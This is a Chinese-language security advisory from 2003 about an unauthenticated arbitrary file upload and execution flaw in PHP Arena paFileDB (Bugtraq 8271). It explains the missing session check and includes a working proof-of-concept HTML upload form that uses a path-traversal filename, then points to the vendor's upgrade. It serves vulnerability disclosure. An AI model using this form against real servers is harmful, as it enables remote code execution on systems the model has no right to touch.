PHP Arena paFileDB任意文件上传和执行漏洞
发布日期:2003-07-24
更新日期:2003-07-30
受影响系统:PHP Arena paFileDB 3.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 1.1.3
描述:
BUGTRAQ ID:
8271
paFileDB是一款设计用于管理员上传文件的服务程序。
paFileDB不正确验证上传文件的用户信息,远程攻击者可以利用这个漏洞上传任意文件到系统并执行。
"/includes/team/file.php"脚本没有检查合法会话,因此通过更改表单参数,可以上传任意文件到系统中,并直接请求以WEB进程权限执行包含在恶意文件中的命令。
<*来源:Martin Eiszner (
security@freefly.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105906835422386&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
---*---
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" \
action="
http://srv/pafiledb/includes/team/file.php"> <input name="userfile" \
TYPE="file"><br> <input name="userfile_name" TYPE="text" \
value="../../../uploads/makeawish"><br> <input type="hidden" name="action" \
value="team"> <input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
---*---
建议:
厂商补丁:
PHP Arena
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
PHP Arena Upgrade paFileDB Version 3.1
http://www.phparena.net/downloads/pafiledb.php?action=file&id=16浏览次数:3792
严重程度:0(网友投票)